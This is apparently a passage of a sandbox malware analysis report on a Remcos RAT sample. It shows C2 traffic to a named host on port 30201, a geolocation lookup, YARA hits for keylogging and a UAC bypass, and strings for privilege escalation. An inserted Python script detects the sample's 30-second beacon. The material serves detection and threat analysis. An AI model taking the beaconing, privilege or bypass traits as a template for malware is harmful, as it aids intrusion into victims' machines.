Dec 9, 2024 22:42:10.906188965 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:42:10.908030033 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:42:11.027600050 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:42:11.143222094 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:42:11.194607019 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:42:11.369736910 CET | 49707 | 80 | 192.168.2.5 | 178.237.33.50
Dec 9, 2024 22:42:11.489306927 CET | 80 | 49707 | 178.237.33.50 | 192.168.2.5
Dec 9, 2024 22:42:11.489402056 CET | 49707 | 80 | 192.168.2.5 | 178.237.33.50
Dec 9, 2024 22:42:11.489861965 CET | 49707 | 80 | 192.168.2.5 | 178.237.33.50
Dec 9, 2024 22:42:11.609793901 CET | 80 | 49707 | 178.237.33.50 | 192.168.2.5
Dec 9, 2024 22:42:12.762583017 CET | 80 | 49707 | 178.237.33.50 | 192.168.2.5
Dec 9, 2024 22:42:12.762646914 CET | 49707 | 80 | 192.168.2.5 | 178.237.33.50
Dec 9, 2024 22:42:12.811506033 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:42:12.930792093 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:42:13.791745901 CET | 80 | 49707 | 178.237.33.50 | 192.168.2.5
Dec 9, 2024 22:42:13.791812897 CET | 49707 | 80 | 192.168.2.5 | 178.237.33.50
Dec 9, 2024 22:42:14.266426086 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:42:14.267865896 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:42:14.387175083 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:42:44.068172932 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:42:44.069478989 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:42:44.189424038 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:43:14.086321115 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:43:14.088033915 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:43:14.207384109 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:43:44.114494085 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:43:44.123960972 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:43:44.243971109 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:43:59.466826916 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:43:59.710438013 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:43:59.819334030 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:43:59.819804907 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:44:00.086797953 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:44:00.087157011 CET | 49707 | 80 | 192.168.2.5 | 178.237.33.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 22:42:08.764693975 CET | 58890 | 53 | 192.168.2.5 | 1.1.1.1
Dec 9, 2024 22:42:09.412091017 CET | 53 | 58890 | 1.1.1.1 | 192.168.2.5
Dec 9, 2024 22:42:11.213816881 CET | 55486 | 53 | 192.168.2.5 | 1.1.1.1
Dec 9, 2024 22:42:11.353635073 CET | 53 | 55486 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 22:42:08.764693975 CET | 192.168.2.5 | 1.1.1.1 | 0x61d3 | Standard query (0) | formationslistcomplet2.sexidude.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 22:42:11.213816881 CET | 192.168.2.5 | 1.1.1.1 | 0x13e6 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 22:42:09.412091017 CET | 1.1.1.1 | 192.168.2.5 | 0x61d3 | No error (0) | formationslistcomplet2.sexidude.com | | 181.131.217.244 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 22:42:11.353635073 CET | 1.1.1.1 | 192.168.2.5 | 0x13e6 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                            • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 178.237.33.50 | 80 | 6580 | C:\Users\user\Desktop\4wECQoBvYC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 22:42:11.489861965 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 9, 2024 22:42:12.762583017 CET | 1171 | IN | HTTP/1.1 200 OK
                                            date: Mon, 09 Dec 2024 21:42:12 GMT
                                            server: Apache
                                            content-length: 963
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                            Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
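Two network traits above are worth turning into detections that do not depend on the sample's hash. First, after the check-in on port 30201 (the Suricata hits for "Remcos 3.x Unencrypted Checkin" and "Unencrypted Server Response"), the session settles into a fixed rhythm: exchanges at 22:42:14, 22:42:44, 22:43:14 and 22:43:44, one every 30 seconds, which is a keep-alive beacon. Second, the first outbound HTTP request is a GET /json.gp to geoplugin.net carrying only Host and Cache-Control headers and no User-Agent, a lookup of the victim's own location in a shape no browser produces. The Python below is added as an example and is not part of the report: it runs a simple beacon-interval detector over the client-to-server packets copied from the TCP table above and a header check over the captured request. The cluster tolerance, minimum repeat count, minimum interval and the geolocation host list are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Client-to-server packets copied from the report's TCP table, as
# (time of day, src IP, src port, dst IP, dst port). Constructed subset: the
# server-to-client direction is left out.
TCP_PACKETS = [
    ("22:42:09.420866966", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:42:09.540543079", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:42:09.541640997", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:42:10.908030033", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:42:11.194607019", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:42:11.369736910", "192.168.2.5", 49707, "178.237.33.50", 80),
    ("22:42:11.489402056", "192.168.2.5", 49707, "178.237.33.50", 80),
    ("22:42:11.489861965", "192.168.2.5", 49707, "178.237.33.50", 80),
    ("22:42:12.762646914", "192.168.2.5", 49707, "178.237.33.50", 80),
    ("22:42:12.811506033", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:42:13.791812897", "192.168.2.5", 49707, "178.237.33.50", 80),
    ("22:42:14.267865896", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:42:44.069478989", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:43:14.088033915", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:43:44.123960972", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:43:59.710438013", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:43:59.819804907", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:44:00.086797953", "192.168.2.5", 49704, "181.131.217.244", 30201),
    ("22:44:00.087157011", "192.168.2.5", 49707, "178.237.33.50", 80),
]

# The outbound request from the HTTP session above, byte for byte (71 bytes).
HTTP_REQUEST = ("GET /json.gp HTTP/1.1\r\n"
                "Host: geoplugin.net\r\n"
                "Cache-Control: no-cache\r\n\r\n")

# Assumption: hosts that only tell the caller where it is located; geoplugin.net
# is the one the report shows.
GEOLOCATION_HOSTS = {"geoplugin.net"}

def to_seconds(hhmmss: str) -> float:
    """Time of day 'HH:MM:SS.nnnnnnnnn' -> seconds since midnight (microsecond precision)."""
    t = datetime.strptime(hhmmss[:15], "%H:%M:%S.%f")
    return t.hour * 3600 + t.minute * 60 + t.second + t.microsecond / 1e6

def find_beacons(packets, min_repeats=3, tolerance=0.10, min_interval=5.0):
    """Per (src, dst, dport) flow, look for inter-packet gaps that cluster around
    one interval at least min_repeats times. Gaps shorter than min_interval
    (handshake, request bursts) are ignored so only slow periodic traffic counts.
    The thresholds are assumptions chosen for this capture."""
    flows = defaultdict(list)
    for ts, src, _sport, dst, dport in packets:
        flows[(src, dst, dport)].append(to_seconds(ts))
    findings = []
    for flow, times in flows.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:]) if b - a >= min_interval]
        best = []
        for g in gaps:
            cluster = [x for x in gaps if abs(x - g) <= tolerance * g]
            if len(cluster) >= min_repeats and len(cluster) > len(best):
                best = cluster
        if best:
            findings.append({"flow": flow, "interval_s": round(median(best), 2),
                             "repeats": len(best)})
    return findings

def triage_http_request(raw: str) -> list:
    """Flag traits of a first-contact HTTP request that a browser would not produce."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    reasons = []
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if headers.get("host", "").lower() in GEOLOCATION_HOSTS:
        reasons.append("geolocation lookup to %s (%s)" % (headers["host"], request_line))
    return reasons

if __name__ == "__main__":
    for f in find_beacons(TCP_PACKETS):
        src, dst, dport = f["flow"]
        print("beacon: %s -> %s:%d every ~%.1f s (%d repeats)" % (src, dst, dport, f["interval_s"], f["repeats"]))
    print("http:", triage_http_request(HTTP_REQUEST))
```

On this capture the detector reports only the 30201 flow (three consecutive gaps of about 30 s); the geoplugin.net session has a single long gap and is not periodic. The beacon logic is deliberately coarse: a production version would work on per-flow byte counts or connection starts rather than individual packets, and would need a jitter model once the implant randomises its interval.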



                                            Target ID:0
                                            Start time:16:41:52
                                            Start date:09/12/2024
                                            Path:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\4wECQoBvYC.exe"
                                            Imagebase:0x400000
                                            File size:4'087'808 bytes
                                            MD5 hash:472CD96B1B5771243C40C10CD034324E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:16:42:07
                                            Start date:09/12/2024
                                            Path:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\4wECQoBvYC.exe"
                                            Imagebase:0x400000
                                            File size:4'087'808 bytes
                                            MD5 hash:472CD96B1B5771243C40C10CD034324E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                             • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Target ID:5
                                            Start time:16:43:58
                                            Start date:09/12/2024
                                            Path:C:\Windows\SysWOW64\wscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs"
                                            Imagebase:0xf0000
                                            File size:147'456 bytes
                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:0.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:4
                                              Total number of Limit Nodes:0
                                              execution_graph 11480 4bda53 11481 4bda5f __lock 11480->11481 11482 4bda6b GetVersionExA 11481->11482 11483 45daa5 11482->11483

                                              Control-flow Graph

                                              APIs
                                              • GetVersionExA.KERNEL32(?,0050EEA0,00000060), ref: 004BDA73
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Version
                                              • String ID:
                                              • API String ID: 1889659487-0
                                              • Opcode ID: c04dfa48e3ade9305df6b90e0814d7ac56acaa11f2c05ddf316d2782b4ea8285
                                              • Instruction ID: 53074f69e8be5e8a26e660d13acfd2b8e57fd68867c852c075706b3384b4489e
                                              • Opcode Fuzzy Hash: c04dfa48e3ade9305df6b90e0814d7ac56acaa11f2c05ddf316d2782b4ea8285
                                              • Instruction Fuzzy Hash: 2CF03074D00B508BD324DF15D882A1ABBE3BF48704B14492EE8565B761D734B8018F95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00409103
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040910A
                                              Strings
                                              • SeProfileSingleProcessPrivilege, xrefs: 00409204
                                              • Could not enable SeProfileSingleProcessPrivilege, xrefs: 00409241
                                              • SeLoadDriverPrivilege, xrefs: 00409179
                                              • SeSystemEnvironmentPrivilege, xrefs: 0040924F
                                              • Could not enable SeDebugPrivilege, xrefs: 0040915E
                                              • Could not enable SeSystemEnvironmentPrivilege, xrefs: 0040928C
                                              • SeSecurityPrivilege, xrefs: 004091BD
                                              • Could not enable SeSecurityPrivilege, xrefs: 004091F6
                                              • SeDebugPrivilege, xrefs: 0040911F
                                              • Could not enable SeLoadDriverPrivilege, xrefs: 004091B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentOpenToken
                                              • String ID: Could not enable SeDebugPrivilege$Could not enable SeLoadDriverPrivilege$Could not enable SeProfileSingleProcessPrivilege$Could not enable SeSecurityPrivilege$Could not enable SeSystemEnvironmentPrivilege$SeDebugPrivilege$SeLoadDriverPrivilege$SeProfileSingleProcessPrivilege$SeSecurityPrivilege$SeSystemEnvironmentPrivilege
                                              • API String ID: 2256020841-272810714
                                              • Opcode ID: aa4f05c840bd627e2d73487595dc64d3eda90993e1edbf8c139383d39da773a4
                                              • Instruction ID: b8165345c32a87174b9950b5c2d351cd3d9e982d028e98a03367593e3ed6d555
                                              • Opcode Fuzzy Hash: aa4f05c840bd627e2d73487595dc64d3eda90993e1edbf8c139383d39da773a4
                                              • Instruction Fuzzy Hash: 89516F70A4024ABEEB10DFA18D84EBF7BACEB04744F14443AB901F9192D778CE419A79

                                              Control-flow Graph

                                              APIs
                                              • _strlen.LIBCMT ref: 00408885
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000104), ref: 00408892
                                              • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 004088CD
                                              • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 004088F8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00408910
                                              • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 00408937
                                                • Part of subcall function 004084F3: lstrcmp.KERNEL32(1.3.6.1.4.1.311.2.1.12,?), ref: 0040852B
                                                • Part of subcall function 004084F3: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 00408553
                                                • Part of subcall function 004084F3: LocalAlloc.KERNEL32(00000040,?), ref: 00408569
                                                • Part of subcall function 004084F3: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 00408595
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040897F
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 004089CF
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00408A1F
                                              • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 00408A90
                                              • _strlen.LIBCMT ref: 00408BEC
                                              • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 00408C64
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408E14
                                              • CertVerifyTimeValidity.CRYPT32(?,?), ref: 00408E2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$ByteCharMultiWide$CertObjectTime$AllocCertificateDecodeFindLocalParamStore_strlen$FileQuerySystemValidityVerifylstrcmp
                                              • String ID: Certificate is valid from: %02d/%02d/%04d %02d:%02d until %02d/%02d/%04d %02d:%02d $Certificate was signed on: %02d/%02d/%04d %02d:%02d$Issuer: %s$Serial: %s$Subject: %s$Signer Certificate:$Even Balance, Inc.$MoreInfo Link : %s$Program Name : %s$Publisher Link : %s$Time Stamp Certificate
                                              • API String ID: 318054356-2987722516
                                              • Opcode ID: b6ab1c5a61adf519dfdb67f66f61e91087094ad8cf8c24daf6457fb125bf4222
                                              • Instruction ID: 7d8227bbab4e461be6b82a648dd884efa89abed3f85ceb009fba5573162d0a8f
                                              • Opcode Fuzzy Hash: b6ab1c5a61adf519dfdb67f66f61e91087094ad8cf8c24daf6457fb125bf4222
                                              • Instruction Fuzzy Hash: F00210B294016CAEDB20DB95CD85EEAB7BCEB09314F0044EBB549E2541E7389F84CF65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Version
                                              • String ID: Win32s on Windows 3.1$Windows 2000 (build %lu$Windows 95$Windows 95 OSR2$Windows 98$Windows 98 SE$Windows 9x (%d.%d)$Windows ME$Windows NT %lu.%lu (build %lu$Windows Server 2003 (build %lu$Windows XP (build %lu$tfP
                                              • API String ID: 1889659487-1510680528
                                              • Opcode ID: 98d1be7cc305dafe69c80b41d1ab38cbc319e1e179023913ef35ca4d4df47ef8
                                              • Instruction ID: 55906365613c07ecc5b13fb5b21a5f07a9f092eab4f43b9f685ed689dae16b9b
                                              • Opcode Fuzzy Hash: 98d1be7cc305dafe69c80b41d1ab38cbc319e1e179023913ef35ca4d4df47ef8
                                              • Instruction Fuzzy Hash: 3071DF70608341AEDB24DB68DC46F6FBBE4BB84704F04892EF1858B2D1D779AC458B5A
                                              APIs
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408E8A
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408E9A
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408EAA
                                              • LocalFree.KERNEL32(00000000,00408E51), ref: 00408EB1
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408EC1
                                              • CertFreeCRLContext.CRYPT32(?), ref: 00408ED1
                                              • CertFreeCRLContext.CRYPT32(?), ref: 00408EE5
                                              • CertCloseStore.CRYPT32(?,00000000), ref: 00408EFA
                                              • CryptMsgClose.CRYPT32(?), ref: 00408F0E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Free$Local$Cert$CloseContext$CryptStore
                                              • String ID:
                                              • API String ID: 1411909688-0
                                              • Opcode ID: 98716ab120791c0f970d4b691cb4bbbbb3a86149c7f850876c4c0de7c4e8e56f
                                              • Instruction ID: 17655f6d4f9585b093950d62dd86047068d7cbd7ae94d3a07630a22f26ce11e3
                                              • Opcode Fuzzy Hash: 98716ab120791c0f970d4b691cb4bbbbb3a86149c7f850876c4c0de7c4e8e56f
                                              • Instruction Fuzzy Hash: A6019731E061A9DBCF216F60DE844EEB672BB42351F1805FAE149709A18B350FD1DF5A
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040189B
                                              • GetLastError.KERNEL32(00000000,?,00000000,00000000), ref: 004018D6
                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 004018E3
                                              • LocalFree.KERNEL32(?), ref: 00401974
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
